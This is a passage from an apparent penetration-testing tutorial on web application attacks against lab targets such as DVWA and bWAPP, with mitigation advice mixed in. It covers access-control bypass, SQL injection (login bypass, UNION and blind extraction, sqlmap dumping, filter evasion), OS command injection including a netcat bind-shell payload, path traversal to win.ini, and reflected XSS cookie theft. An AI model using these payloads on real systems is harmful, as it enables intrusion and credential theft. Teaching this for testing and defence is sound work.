protected at all costs when dealing with these issues, as it goes without saying that
URLs do not have any implied secrecy.
Multistage functions must revalidate credentials at every stage of a web
application function. For example, if a bank employee has requested funds be sent
to a certain source account, and has verified themselves, an attacker should not be
able to intercept the final stage post request and change the destination account in
a horizontal bypass. Static resources are also an issue with multistage processes. If
a user goes through every step of purchase to receive the download link to an
ebook, and the ebook download url is a static link such as
http://book/download/923434242342.pdf, an attacker can attempt to skip

purchase and just brute force numbers to get ebook download urls. If the numbers
are for example, ISDNs, it becomes even simpler.
There are numerous steps to take in securing access
controls considering every request across the app must be studied. Other methods
to test for include improper protection of the referrer header. Many web
applications will not allow ordinary users to access administrative function but fail to
do this If the user modifies the referrer header to come from an administrative
page. Location based access controls are useful as a deterrent or in combination
with other methods but also useless if used alone. A VPN, or web proxy mapped to
the proper approximate geo location of the specific user will nullify this control
check. Simple social engineering methods or recon can successfully deduce a
users basic location.
A final issue to touch up upon is correct firewall/server
configuration in relation to filtering requests to unauthorized areas of the web
application. It would be a common rule to enforce that a non-administrative
account sending an http get or more likely a post request to an administrative URL
would be blocked. Unfortunately, it is more complicated than this. What occurs in a
situation where the attacker sends a head request instead of an http-get request to
the application? If the application is not configured correctly to only allow and block
http get requests, the type of request can be altered in the intercepting proxy. Let
us go over briefly again what a head request is. A head request is simply an httpget request without a return of a message body. The attacker will not care if there is
no message body return if they are able to still pass the request through the broken
access control by changing the request header and the url parameters. Perhaps,
they create a new user account, and they indeed can check this manually after the
fact, regardless whether a message body is returned or not. It is imperative
therefore, that the application level code verify what request method is being
issued, and to block offending requests that should be filtered out. Worst of all
insecure access control methods are URL parameter access control. It has been
seen in applications in the past, regardless of how blatant of an issue it is. A
common theme would be something along the lines of Manipulating the URL
parameters could allow access. This is a more obvious example, and other
examples may be much less intuitive, but if a determined attacker is able to create
many accounts, and even at some point get a higher privileged account, they can
analyze patterns or the methodology used in the passed URL parameters to bypass
access controls.
Now for the attacks:


Logged in as an ordinary user at first.

We see examine the GET request header.

We simply change the GET request header(admin.ashx). If the application is

vulnerable, it will allow us access.


Application is broken.

Above we are rejected by a more secure application.


In this request, we need to not only change the GET head to admin.ashx? but
apparent an submitting an admin=true value breaks the application.


The above is a useful application in Burp to use if you have white box access to the
application. BURP comparer will compare two site maps of an admin and a user.
So, step through the entire application as an admin, and then step through the
application as an ordinary user, and save the two sessions. BURPs site map
comparer will highlight if any access control are broken as it applies the same http
requests to the ordinary user. As seen above one URL accessible also was
accessible to the ordinary user.

The above is another GET request intercepted by BURP. This site has very weak
access control methods.

We attack the user id payload to harvest every user account.


According to the attack, looking at the length of bytes returned, user id 53-59 are all
accounts we can access.
Testing for access control vulnerabilities can be easy or very hard depending
on the subtlety of things. With that being said, it is mandatory to step through the
application request by request, testing all low privileged accounts and their access
to vertical privileges outside the scope of authority. A mandatory design should be
a central access control checker, built into the application. Each request should be
passed through this central application, which in turn checks the users role, and
then decides if the requested URL is under the permission umbrella assigned to the
user being checked.

SQL Injection
Data stores are highly vulnerable to attack and therefore
it is imperative to cover the core vulnerabilities exist. Common database functions
are to store usernames, password, credit card numbers, and other highly sensitive
data. A functioning web application is one that passes user input through the web
application and successfully fetches the appropriate content in the database, and
returns it to the user. It is understood what the function of databases are, but what
exactly makes them vulnerable to exploits? The code injection that will be focused
on in this project is SQL injection using the language of SQL. The SQL language is
an interpreter based language. More specifically, the code interacts with the web
application with use of a run time component. The interpreter therefore, receives a
mix of human instructions and code instructions to execute. With this mixing of
human supplied data, and SQL data, it is the interpreters job to separate the
different instructions and appy them correctly. The pure nature of how the SQL
language interacts with the data stores behind the web application make the exploit
known as code injection possible. There are a few different SQL database types by
MySQL will be focused on here. Proper SQL injection techniques allow an attacker to
bypass logins, add or modify data, of hijack a database completely and execute a
shell on the server.

The first attack will be a user login bypass. To fully understand the
attack a basic SQL query to fetch a username and password and return it to the web
application for login must be understand. When a user supplies the username
Shawn to the username field, and supplies the password vulnerable to the
password field box and submits the entry, the following SQL query sent to the
database would be as follows : SELECT * from users WHERE username=shawn and
password=vulnerable. The table being checked is the users table, and every row
in that users table will contains a username column. This specific SQL query is
querying for the username of shawn, and the password of vulnerable, so the if the
users table, which contains the columns of username and password, contain a
match of shawn, and vulnerable, it will be returned to the web application. In
fact, if it is not found or if the password was incorrect, it will still be returned to the
web application, but only if there was a match, will the applications logic allow an
authenticated session to begin. As an attacker, with malicious intent we dont know
the users password though, so we really do not care about the entire SQL
statement. It is important to know than that - - successfully comments out the
rest of an SQL statement. An attacker may want to try shawn in the username
form, and than or 1=1 in the password field. After all, or 1=1 is a true
statement but surprisingly, performing such an action validates the entire sql query
as true and simply pulls the first record in the database, for instance admin. We
need to specify the username in brackets, because without brackets the or 1-1
true sql statement is simply applied to the whole query. Bracketizing the injection
like this : or (1=1 and username = shawn)would specifically work on an
injectable login box to log in as the specific user. Let us revist ' or 1=1 being
injected into the username and password field though. This is a useful command
when trying to get the admin account of web application. Considering the fact that
this true SQL query returns the first value, we can safely wager that the first record
in the users table is a high level user that was first setup by the developers of the
web application.
The first step in SQL injection is to actually verify that a vulnerability exists
and that SQL is being used. For MySQL, inserting a single quote should
sufficiently throw an syntax error as a broken query.

We can deduce from this error message that SQL commands in the login box are
not being sanitized and instead being passed to the web application.

As seen above, executing an or statement that is true on the left side makes an
entire SQL statement true, and by submitting that into the login box, we
authenticate as the first user in the table, which is appropriately the admin The first
quotation tick specifies the username portion of the query, with a true statement
being applied, and since the password is not known, that part of the query is
commented it.
Many web applications employ weak filtering mechanisms to defeat SQL injection.
Constant fuzzing of a tester where they encode blacklisted characters and
expressions with different encoding techniques can defeat weak blacklists. This will

be shown in the following screenshot, as URL encoding of certain characters in the
injection is performed in Burp Repeater. Repeater should be used anytime a tester
wants to make quick changes to the parameters being submitted to the application,
without having to capture the request again. The subsequent responses show up on
the response pane, showing rendered results. Notice or 1 =1-- has been encoded
as or+1%3d1--+ which bypasses this particular weak filter.

In the following screenshots an exact user will be zeroed in on.

In the shot above, a simply ease of use function is applied. The password login box
is edited, and its size is changed from 20 to 80. This expands the size of the
box so we can execute a long query. Type=password is also edited to be
Type=input so actually text is seen on in the password box, instead of bullets.

Here we see the proper bracketed command, with a true OR statement being
passed to the database with the username column being specified as user Shawn.
Again, take notice of the double hyphen and the space that follows it. In MySQL,
this comments out the remainder of the query, or more specifically the
password part of the query since we are not aware of the password. The actual
query is formatted like this: SELECT * FROM accounts WHERE username='' AND

As seen above the code injection has successfully logged us in as the user shawn.
Next, an attack against all user data will be leveraged.


Here the syntax is any username with a true SQL statement. This command should
succesfully dump all the records. We know from before the syntax this server uses
is SELECT * FROM accounts WHERE username='shawn' so adding the at the
end of allnames and then commenting out the rest of the query, more aptly
changes this command to select all user accounts. The results are seen here:

A successful dump of the entire users table and its corresponding columns was
performed, but modification can be made again for just a single user. Command
injection of or (1=1 and username=shawn) results in the following user info


The above web application was very easy to exploit because in its error messages,
very fruitful information was given. The error message thrown by the SQL server to
the client showed the syntax of not only the database name, but the table names,
and the column names. The next attack will leverage Burp Suite to brute force
table and column names with a more vague error throwing web application, so SQL
injection can still occur.

The attack is started by probing the web app to see if it accepts SQL syntax.

An error is returned that verifies data is not being sanitized, but it is more cryptic.
The previous web application revealed entire query structures. The injection points
need to be discovered so an order by clause must be passed into the url parameter
until an error occurs.


Passing order by 3 into the url threw an error where as order by 2 and order by
1 produced no errors on the page. Two spaces will be used to inject as follows:

Viewing the screenshot above, a UNION SELECT query is performed, but with null
values since it is not known what the values are. First name: and Surname are
exposed on the page in red. Next we will execute a version command by
substituting @@version into the first null space. The query will be
%20@@VERSION,NULL--%20%20&Submit=Submit# and returns the following:

The attacker is not aware of what the table name is or column name is, so an
attempt to pass the query to Burpsuite for automation should be attempted.
Examine the url

%20NULL,NULL%20from%20UNKNOWNTABLE--%20%20&Submit=Submit#. The url
is modified to SELECT FROM unknowntable and returns the appropriate error:

The next step in the attack is to pass the url to Burp Intruder so the table value can
be dictionary attacked.

The unknown parameter of the url is flagged to be attacked, and a

preloaded database of popular table names will be the dictionary used.
(See next page)


After the attack is run, it is seen that by looking at the length of the average
request, they range from 600 to 400, and rendering the page, results in an error
that the table name does not exist.


Upon ordering the payloads by page response length, outliers are found, with
lengths ranging in the 4000 to 5000 range. These are successful tables. It is
important to notice that there is no error about unknown table names when the
page is rendered. We are focused on the users table though.

It is known the table name is users, but we are unaware of the column names so
that will now be brute forced using the same method that the table name was brute
forced. Notice that unknowntable in the first payload attack has been changed to
the proper table name of users, and now column_names is the payload insertion
point. Of course, a different dictionary will be used, one that contains common
column names instead of common table names. Upon studying the screenshots, it
can be seen that the parameters, user, password, and user_id were all
successful hits based on the different length and the final rendering of the http


At this point it would make sense to attack all the user ids to get the username and
password dumps pertaining to each id. This web application interacts in a way
where this is not necessary, and username and password can just be extracted, but
many applications vary so it will be shown regardless.

The command being passed in the url is SELECT user(column),password(column)

FROM users(table) WHERE user_id=0, This time the injection point of the payload
will be the user_id field and a number iteration brute force will be used to dump the
ids. If confused by the %20 in between the parameters, it is because an actual
space when url encoding is encoded as %20. Burp has the useful feature of URL
encoding as one type, which makes editing parameters in URL queries painless.

Sequential number iteration brute force being applied here:

The results are returned in Burp Intruder and a user with an id of 4 is investigated.

The username is Pablo and the password seems to be an MD5 hash which is trivial
to break. Web developers should have long abandoned MD5 as a hashing method,
using SHA-2 and salting, but it is still seen in unsecure databases. Copying the hash
over to an MD5 decrpytion database cracks the password easily. It is revealed as


There will be situation in web applications where no error is shown and

the page reacts no differently when trying to submit crafted input. The type of SQL
injection that must be performed in this case is that of blind SQL injection. Going
even further, when no string fields are injectable with because are being
filtered properly, an attacker must look to attack the application by its numeric
fields. This is done by using the substring and ascii functions of SQL. With
limitations like this, it is still possible to extract data byte by byte to return useful
values. An example of this would be as follows:ASCII(SUBSTRING(Shawn,1,1)).
Injecting this into a numeric form field would yield the result of 83. Substring 1,1
returns the value S, and then conversion to ascii returns the value of 83.
Following this logic, an attacker can still perform injection one byte at a time,
though this is brutally time consuming and automated methods are preferred.
SQLmap is a preferred tool to use to automate blind SQL injection where numeric
fields must be injected. How can an attacker leverage a blind attack when no error
or response is given by the web application? The key is to produce conditional
Boolean based attacks where true and false conditions make the application react a
certain way. For instance, a vulnerable application that logged in users when the
query was for example, shawn AND 6=6 and would reject shawn AND 6=5
. The 6=5 condition is a false statement and hence rejection occurs. If having
to inject into a numeric field, injecting the following would be synonymous to the
above examples: ASCII(SUBSTRING(Shawn,1,1))=83 as a true statement, and
ASCII(SUBSTRING(Shawn,1,1)=84 as a false statement. Think of a hypothetical
application that allows users to search for movies in its database. When a movie is
in the database a message is returned that the movie exists in the database. When
a movie is not in the database a message returns saying no matches were found. If
the attacker knows the movie Robocop exists, and queries Robocop AND 1=1#
returns the message the movie is in the database than the attacker can probe
further. Querying Robocop and 1=2# returning an error that the movie is not in
the database, following the true query, would verify the form was vulnerable to
blind sql injection. Cycling through the characters one byte at a time allows blind
SQL injection to work by getting hit after hit until the entire string is extracted
successfully. Obviously using an ASCII chart is necessary with this type of injection,
though automated techniques are preferred.

We have a form accepting user input above. It takes user ID numbers and returns
their first and last name.

There is no user in the database that goes by the id 2 and 1=1, yet the
application returned the first and last name regardless. This tells the attacker that
SQL queries are able to be passed through the form blindly.

Passing the query with correct syntax a second time with in the appropriate
position yields no response from the web application this time. This tells us that
there is a security measure on the web application that is filtering quotation marks.
How will injection occur when specific columns and tables must be named if quotes
are being blocked by the web application? The attacker will have to convert the
terms to ascii.

The number of attributes/columns has been found for the injection points. The
command 2 order by 3 returned no database results, telling the attacker that it is
2 injection attributes.


Union select query to show how the application is interacting with the queries,

2 AND 1=1 union select null,user()# executed above reveals root@locathost as

the user in the surname field.

The true SQL statement is abandoned and switched to 1=0 instead of 1=1 here
so the attacker can eliminate the Gordon Brown record being pulled every time with
a malicious query for better clarity.


2 AND 1=0 union select null,version()# command reveals to the attacker the
MySQL version being 5.1.41. What if the query was being filtered by a firewall and
we needed to extract byte by byte?

2 and 1=0 union select null,substring(@@version,1,1)=5 # command executed

by above returns a 1 in the surname confirming that indeed 5 is the first character
of the MySQL version. Then we need to find a "." because it is 5.1 etc. We know
that "." is equal to a value of 46 in ASCII. Notice also that (2,1) instead of (1,1)
because we are looking for the second character. So 2 and 1=0 union select
null,ascii(substring(@@version,2,1))=46 # is the appropriate command to execute
to confirm the next character. The surname returns a value of 1 and not 0,
confirming the right character is indeed ..

The attacker could continue doing this to enumerate the entire version one value at
a time, but the shorter commands have not been filtered, though we will run into
firewall issues later that will complicate things.


2 and 1=0 union select null,database()# reveals that dvwa is the name of the
database we will be extracting data from.
2 and 1=0 union select null, table_name from information_schema.tables WHERE
table_schema='dvwa' is the command to get the table names from the database.

Why does the web app return no results? The firewall is filtering quotes. we must
encode dvwa to ascii. DVWA without quotes encoded to ascii encodes to
0x64767761. The query now changes to:
2 and 1=0 union select null, table_name from information_schema.tables WHERE
table_schema=0x64767761. This turns out to be a successful injection as seen

The following tables are dumped, which are guestbook, and users, but we are
focused on getting the columns from the users table. The following command

should be executed. We must remember to ascii encode users because passing
the command regularly we return no results.
2 and 1=0 union select null,concat(table_name,0x0a,column_name) from
information_schema.columns where table_name=0x7573657273

We have multiple columns of interest. namely the user and password columns that
exist in the users table as seen above. The avatar, first_name, last_name columns
will be ignored. The final step is to pull the data from the user and password
columns with the following command:
2 and 1=0 union select null,concat(user,0x0a,password) from users.
No ascii encoding needs to be done here as no quotes need to be used in the actual


The username and password dumps were successful.

The next application that will be injected into gives even less information so even
further blind guess work injection will have to be employed. Automation attempts
should be made at this point once the vulnerability as properly probed for.

Ironman' and 1=1# returns a result from the database saying the movie exists.
Many would find this result strange considering the fact that there is no such movie
called Ironman, followed by an SQL true statement. This tells the attacker that once
again, web application is not separating human input from programming input.


iron man' AND length(database())=1# , is the command executed above. The

attacker is asking if the length of the name database is 1 character long. The movie
does not exist when executing this query. Upon trying iron man' AND
length(database())=5# we finally get the result of "movie does exist", verifying
that the database is 5 characters long.

Next we need to guess every character of the 5 character long database name.
This tedious task is started by the query
iron man' AND substring(database(),1,1)='a'# .
The movie does not exist and therefore the first character cannot be a.
iron man' AND substring(database(),1,1)='b'# is the second query attempted.
Lowercase b is queried and the movie does exist, which tells us the first character is
indeed b which is shown below.

Now the second character of the 5 character database must be guessed. But we
need to speed up this process by brute forcing it with Burp. So let's make a payload
andrun the payload parameter through "A-Z, a-z, and 0-9". Then we can check the

length of the page to see what the correct value was. Using the bruteforcer we can
now automate the task of ripping through 62 possible values.

The attacker here should delete the part of the URL query where the character is
being guessed, and replace it with the word payload for clarity, than select the
payload as the position to brute force. In replace of payload, A-Z and 0-9 will be
processed automatically.

The above would be the correct brute force options for this attack, as the attack
only needs to one through every possible letter and number only one time, making
max length of 1 appropriate. As seen in the screenshot below the second value is
obviously W. Continuing this process reveals the database name is "bWapp" which
stands for buggy web application. As seen earlier in this tutorial, the attacker
knows by arranging the results by the web responses page length in bytes. The w
and W payload produced a different length of bytes by the web application where
as all other letters and numbers were less and also equal to each other. It tells the
attacker that w is a special payload. Upon rendering the page it is seen that W

is indeed the next character in the string. It was the 23 rd request and the complete
attack was completed in less than 10 seconds.

What about the tables and columns names? Even using burpsuite with ita
bruteforcing methods is an exhausting task for this type of blind injection.Attention
wil; be turned to SQLMap for further automation. SQLMap is a popular Linux tool for
auditing of database and web application security.

Testers should know that when configuring the tool to perform the attack, the web
address of the vulnerable page as well as the cookie is needed in the parameters,
before starting the attack. Many applications vulnerable to SQL injection will need
to be tested during authenticated sessions, therefore the cookie parameter is vital
to allow SQLMap access.

SQLMap indeed detects that the title parameter is vulnerable to injection. The
tester can defer attacking other parameters in the URL at this point.


Having previously discovered that the database name was bwapp, the attacker
should specify the database that should be attacked in order to gain the table
content. -D bwapp tables is the appropriate flags in this example.

Sqlmap has brute forced the table name successfully. Blog, heroes, movies,
and users exist as tables in the bwapp database, but attention is turned to the
users table.

-T users columns are the appropriate flags that specify the attacker wants to
brute force the columns of the users table.


Above, The columns are brute forced and interesting ones are revealed. In this
attack the rows for the columns email,login, and password will be extracted.

The proper flags -D bwapp T users -C email,login,password dump instructs

SQLMap to dump the columns data of email, login, and password from the users
table that exists in the bwapp database.

The accounts are dumped, and the weak hashes are cracked automatically by
SqlMap, revealing the username bee having a password of bug Interestingly,
the user shawn has a hashed password that could not be cracked by the default
wordlist contained inside of SQLMap. The attacker should submit this hash to one of
the many free online cracking stations that use large rainbow tables.


This is performed and the hash is cracked. The password is revealed to be nyit.
SHA1 hashing is not a suitable hashing method regardless, and at least SHA2 should
be used.
SQLMap proved to be more efficient in dumping the database than the
burp method used. It should be noted that SQLMap did not use Boolean blind brute
forcing based on page response but time based blind injection. The idea is the
same in the sense of the attack byte by byte extracting data based on condition
responses from the web application, but in this case, a time delay is injected. If the
server responds to the query with the correct time delay specified by the attacker,
the conditional yes or no to a command is answered. If it takes abnormally long
that would likely reflect a true statement. For example SELECT * FROM users
WHERE id=5-SLEEP(15) injects a sleep command for 15 seconds. If the servers
response to the query reflects an abnormally long response than it justifies the yes
or no question being asked or query being executed. This is painful to do manually
so thankfully tools like SQLMap automate this process for blind and deep blind SQL
SQL injection prevention is complex and a defense in depth approach in
layers is the best suited approach to securing applications against code injection
attacks. Firstly, all databases should be target hardened. This implies that
appropriate permissions for databases are used. Databases that interact with the
web application rarely need administrative type of access, and therefore admin
access privileges of the web app over the database should be stripped. The type of
functionality of the purpose of the database needs to be taken into account. For a
database that is only performing read functions more than 80 percent of the time,
write permissions by the web app to that database should be completely disabled.
A different account should be used entirely just for performing a write on a query in
this situation. This severely limits the effectiveness of an attacker where
exploitation exists. Though accounts should be divided permission wise based on
their functions, the database as a whole should remove functions it does not use.
The less functions an attacker can utilize, the less effective the injection attempts.
Many issues will arise with an attacker trying to inject into a database where the
functionality is neutered and tailored specifically for the applications use, and not
for an attacker looking to leverage queries. Enterprise databases come out of the
box with a large amount of default functions enabled, so this should be looked into
thoroughly. Patching is hugely important as well. Database admins should use a
subscriber based patching mechanism, where live patches are rolled out in real time
as soon as an exploit is discovered in the wild. This is important if the fix has not

yet been pushed by the actual vendor. Filtering and blocking queries must be
applied as well. In this tutorial, the use of quotes being used to execute statements
has been seen frequently. The solution to this is to obviously take single quotes
submitted by the user, and sanitizing it, perhaps by doubling the quotes. This
would successfully through off the syntax of the malicious query. This is not enough
unfortunately, and in one of the attacks above, this filtering method was defeated
by submitting the data numerically, converted to ascii. What about a filter blocking
the order by statement? The following bypasses could work:OrDeR,
%00ORDER(#00 is url encoded whitespace, which should be filtered),
ORORDERDER(order is filtered once, allowing the hidden order to pass) and URL
encoding the characters to be %4f%72%44%65%72.

Ultimately, combinations of whitelists and blacklists and proper

escaping of certain characters also should be applied to stop injection, but
parameterized or prepared statements are perhaps the most crucial. Stored
procedures, which is another term for it, are more secure than constructing full SQL
queries without set placeholders for data. Using APIs that use parameterized
statements apply the logic that was first mentioned when discussing why injection
can occur in the first place. Using parameterized statements, the application can
discern between human input versus SQL programming input not from the user by
forcing all user input to never be part of a query. A malicious user may pass a
username query to the database, but the application will hit it with a prepared
statement that fixes the structure of the query, then the string is finally set and is
then executed. Nothing in the query can escape username and be applied as an
SQL query. The code from the Web Applications Handbook illustrates the proper
API code to sanitize user input:
//define the query structure
String queryText = SELECT ename,sal FROM EMP WHERE ename = ?;
//prepare the statement through DB connection con
stmt = con.prepareStatement(queryText);


//add the user input to variable 1 (at the first ? placeholder)

stmt.setString(1, request.getParameter(name));
// execute the query
rs = stmt.executeQuery();

Analyzing the above code, it seen that ename=? the ename is used as a
placeholder and not just straightforwardly passed to the database. It hits the
prepare statement and proper parameters are applied to it before being executed.
Also, notice the setString being applied to the parameter. Any executable
commands are blocked because of the setting to string. When applying
parameterization of queries, it should be done for every query, not just queries
assumed to be more important to the developers. Going further, all query data
supplied needs to be parameterized. Developers have used prepare statements
that did not parameterize all data submitted, instead allowing some data to be
concatenating into the string, allowing injection to occur. Placeholders should not
be allowed to utilize column and table names. If there is a rare case where the
application does need to specify a column or table according to user supplied data,
than heavy whitelisting should be applied, so nothing outside of what
tables/columns exist can be submitted. Since user input is being accepted in this
example, heavy whitelisting, length limits, input validation replacement, and
character limits should be applied heavily.(character limits allowing only
alphanumeric characters and no special characters). It was seen in the attacks how
much harder injection was when errors were not dumped to the attacker, forcing
blind injection methods. Though this wont stop a determined attacker, the
application should never dump errors to the client. Again, a defense in depth
approach is far superior to any single defense mechanism.

OS Command Injection
Numerous web applications employ utilities for a user to interact with
the application in a manner that allows the user to view directory contents, or ping
addresses to test availability. Web applications meant for administration of servers,
printers, and firewalls usually will employ built in interfaces that allow the user to
make calls to the operating system. Being able to access the operating system
from an application allows powerful features for users to use network functions,
interact with other processes, and make changes that are relevant to their account
at a file system level. The caveat of allowing direct operating system commands
passed to the server is that this opens a large vulnerability for command injection
that is outside the scope of what the application intends. An example, which will be

shown to be exploited, is a web app that allows users to ping a website or ip of their
choice. A vulnerable web application could allow a malicious user to use escape
characters such as : ;, |, and && to escape the original command and add
their own command input, effectively allowing remote command injection.
Inherently, the web applications permissions to the server are usually enough where
command injection can be leveraged to gain access on the back end to the entire
server through a remote shell, and subsequent privilege escalation is possible from
When testing for command injection flaws a tester should crawl through
the applications contents and see where any functions of the web application exist
to probe the servers file system or performing process functions like a pinging
function. It is important to note that an application does not have to simply submit
user supplied data simply through a function built into the application. The
penetration tester should analyze all cookies,url parameters, and form fields to see
if user input that interacts with the server is passed in through these mediums as
well. The shell metacharacters that allow custom OS injection must be understand
as they differ according to what underlying server OS is being used, namely
whether or not Windows or Linux based. The focus will be on ;, |, and & as
the shell metacharacters that are commonly used to conjoin commands together.
Utilizing && will allow the second command to run if the first command is verified as
running with success. The || doubling of this shell metacharacter allows the
second command to run even if the first command failed.
Commonly web applications will still be vulnerable to command
injection but nothing can be inferred directly by the application that shows
successful execution of the commands. An attacker can still test if they are passing
commands directly to the server through the application through a blind process.
Attacks will be demonstrated that display the techniques of doing this. Instructing a
web application through command injection for instance, to ping itself for 30
seconds and then watching the web applications response to that command can
verify a blind injection. Executing for example, ping n 50 is a tactful
move by a tester to infer blind injection. This command should cause the
application to freeze the request submitted for 50 seconds as it pings
itself( being the loopback host ip) for 50 seconds. If interacting with a web
application with a Linux backend, a command such as ping c 60 where
c denotes the amount of times to send a ping request, should show a noticeable
effect on the application.


The above shows a normal site, allowing you to view the contents of a folder that
you have created. You cannot create or execute files though, or seemingly do
anything else.

In the second screenshot, escaping using the ampersand character and injecting
custom commands is attempted, and seemingly successful.


Screenshot 3 Shows the ip config and directory contents dumped successfully.

Using the | character worked as well to execute commands. The site security was
stepped up to filter command joining characters following the successful attacks. In
the following shot, command injection fails because of character filtering by the
application. | ping

The && characters are reused because of the failure of | to perform a successful
injection. Filtering this command as well, one could look to attempt ; . The
semicolon will allow everything before the semicolon to be executed, and then
anything following the ; to then be passed to a new line for execution. Other
operators to try are $ and . Further filter evasion can be attempted by

performing a %0A ipconfig %0A for example. This is simply the URL encoding of
a whitespace to bypass filters and still allow the command to be passed.

The next shot shows even more security, as nothing is returned to the user upon
input, but we may be able to test for a blind injection. The command injection
appropriate instructs the server to ping itself (host loopback ip= for 30
seconds). If the web application is unresponsive for approximately 30 seconds that
may confirm OS commands are still being passed.


The application gets stuck for 30 seconds, so if the tester

sees it hang on Connecting that is a good sign that command injection is still
successful. This is not the only method to test for blind command execution testing.
A tester can invoke the application to send an email to them, ping a website in their
own control, or write files to an area accessible by the browser. The following
screenshots will show the write file test to be a successful method.

For example: echo "insert whatever text u want" > nyit.txt. If this text file gets
created the tester knows the application is exploitable for more nefarious attacks.
Also worth mentioning, is if one can add their own files, this is a pathway to an
attacker adding shell scripts and other infectious payloads that can cause complete
compromise of the server.


The file was purposely written to an area of the site a basic user has access to, and
as expected, the custom nyit.txt file was created, verifying command injection is
possible even if not overtly stated by the application.
The next attack will outline getting a shell on a website by hacking an
application through remote command injection. This website lets you ping other
sites to see if they are online. The problem is, this command is passed to the OS
through the user input, allowing us to use escape characters to execute custom
commands against the operating system.

The web application certainly functions correctly, as it indeed pings the IP address I
specified,, but I have added a more nefarious command to the IP
and chained them together.;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l
1337 > /tmp/pipe is the entire command. This command instructs the server to

open a netcat session on port 1337 for the attacker to connect to. The other
parameters are necessary to interact with the OS with shell access. This is being
done blindly, but if a connection is able to be opened on another machine running
NetCat, success is verified.

The above command is our other machine attempting to connect to the web server
using NetCat, at the servers address, and the appropriate port is listening on.

The connection is confirmed opened based on terminal output. The web

applications back end OS is compromised.

With complete access to the sites server, I execute some Linux commands to view
information about the users logged in. From here further damage and exploit is
possible, as well as further privilege escalation.

The best way to stop OS command injection from occurring is to use
APIs to handle the exact function the website intends to perform, where there is no
other functionality that can be used to be leveraged against a server. This way the
end user is limited, and the web application has a division of labor where no direct
operating system calls can be made. Furthermore, applications should utilize pure
command APIs that launch processes from direct invocation that comes with its
own command parameters instead using a shell interpreter. The shell interpreter
will support the very command chaining and shell metacharacters that allow custom
command execution outside of the applications built in function. In some
situations, the application must absolutely support direct command input being
passed to the server. If this must occur, severe character whitelisting is
encouraged. Using the ping a website for free application as an example, this
application failed to whitelist only numbers and the .. A character limit should
also be imposed, but there is no reason a function that only takes numbers and .s
should ever except any other characters outside of that. Command injection is
dangerous, so disallowing user supplied input to any function that is dynamic or an
include function is far superior to whitelisting as it avoids command injection as a

File Path Manipulation

Many functions exist within applications where the app reads and writes
to the file system. More specifically, there exists functionalities in web applications
where user submitted input is passed to the application as a filename. The
application takes a filename as a parameter, or in other cases, the application may
fetch user data as specified by the user, by fetching the file form the local file
systems appropriate directory.
The actual vulnerability exists when the application reads or writes to a
filesystem in such an unsafe manner, that is allows an attacker to submit their own
malformed input to change the way the application is interacting with the file
system. Most commonly, this comes in the force of inserting path traversal
sequences into the url parameter. This path traversal attack is also known as the
../ attack because attackers can keep insert the traversal sequence until they hit
the outside directory. Effectively used, an attacker can read unauthorized files, or
make unauthorized writes.
Looking for path traversal vulnerabilities can be a difficult because of its
subtle nature. The tester should focus on obvious functions of the application where
it is explicitly interacting with the file system. Notably this would be any upload and

download function, any function where users are submitting images or documents,
or even sharing documents across a workspace.
Applications attempt to filter the characters used to perform traversal.
This is good practice but can be defeated with custom encoding techniques. An
attack will be shown where encoding the traversal payloads defeat a filter. Types of
encoding of the dot and slash can be:URL, Double URL, UTF-8, and 16 bit Unicode.
With that being said, filters need to be mindful of the different encoding schemes
that the . and the /, as well as the \ can utilize. It has been seen on some
windows application servers that the filter only blocked the \ since that is the
windows default directory separator. Developers forget that both the \ and the /
can be used for traversal, though on Linux servers it is necessary to use /.
Besides heavy sanitization, blacklists, and whitelisting, developers can
also look to simply not have user input be passed to the file system where it isnt
necessary. Most files can be simply placed in the root directory and accessed by the
url, instead of being passed as a parameter to a file system API. If this cannot be
done, hard coding the file types is necessary. If the application is meant to fetch
pictures, enforcing on JPEGS should perhaps be enforced. After a file is fetched, as a
final step after input validation via filters, the application should utilize the proper
APIs that specify the file accessed within the function, exists within the directory
that is appropriate and not outside of it.
Two traversal attacks will be launched. First, a simple attack and followed by that, a
more advanced attack with automation and payload encoding to bypass the filters.


Let us see if it is possible to travers out of the current directory storing this photo,
and get to the C:\\windows\win.ini configuration file.

By looking at the URL, it took 3 path traversal to complete the attack. While simple
and effective, it should never be this easy.


Since anyone reading this is far familiar at this point with Burp, some previous steps
(intercepting the request) will be skipped. Above the URL is sent to Burp and an
automated attack to bypass the sites filter will be launch. The payload is where the
traversals will be placed.


A preloaded list of different

path traversal with filter defeating traversals is loaded.

The attack is completed and the results are ordered by the length in bytes of the
response of the application. The second pane on the bottom shows the win.ini
configuration file has been read by the application as we specified. The application

is vulnerable to path traversal when performing double URL encoding on the
traversal characters.

Attacking users with Cross Site Scripting(XSS)

Most of the attacks described previously looked to leverage
vulnerabilities and weaknesses within the server of the web application, and as time
goes on these vulnerabilities are less occurring. The number one attack found in
the wild, that may ignore owning a web server, concerns itself with compromising
the client side user. XSS attacks are extremely powerful, and when regarding a
reality where users of an application use different browsing behavior, as well as
different browsers and plugins, attacks against users can be far more profitable and
painless than breaking into application with server side defects. Launching a client
side attack against thousands of users to steal credentials or log keystrokes by
using simple XSS is a more obvious choice for an attackers than trying to break into
a hardened financial corporations server. There are multiple derivatives of XSS and
multiple ways to inject them into web applications to attack users.
Reflected XSS attacks account for 75 percent of all XSS attacks. Web
application developers perform to deliver dynamic content via URL parameters to
users as it allows them to not have to create custom pages individually, in order to
deliver the appropriate content to the user interacting with the application in
multiple ways. For a better understanding, consider error pages. Consider the
custom error page that would be possibly delivered to all users who put the wrong
input into a credit card form field:
alert=incorrect+input. The page comes up and it is shown that the message of
incorrect input is displayed on the page, allowing a tester to infer that the
parameter of alert is being sent back to the client, embedded into the html sent by
the server. This creates the possibility of crafting custom input in the alert
parameter, such as malicious javascript, which can be used to hijack sessions from
users, among other things. There is a far simpler test for reflective XSS than using a
complex javascript payload. Using a simple alert box popup can test if the site is
potentially vulnerable to a reflected attack. If a user clicks on the link and a
javascript alert box executes on the page, this is a problem. It is seen why the
name of this type of XSS is referred to as reflected, as the application reflects the
attackers payload onto the users browser.


A basic application that takes a users name and delivers it back dynamically is seen
here. The name parameter is of interest to test for.

A tester can now enter a payload to test for in the name parameter, easiest being
an alert box such as : <script>alert()</script. Reloading the link dynamically
shows the script was executed on the clients browser.

A more practical example of this would be a situation where a user logs into a
website and therefore receives a cookie so their session can be validated and
tracked. A malicious attacker who has found a reflected XSS vulnerability on the
specific site can insert a payload that instructs the client upon clicking the link, to
send their cookie in a request to the attackers domain. When the user gets
phished into clicking the link thinking it is safe, the token is sent across domains.
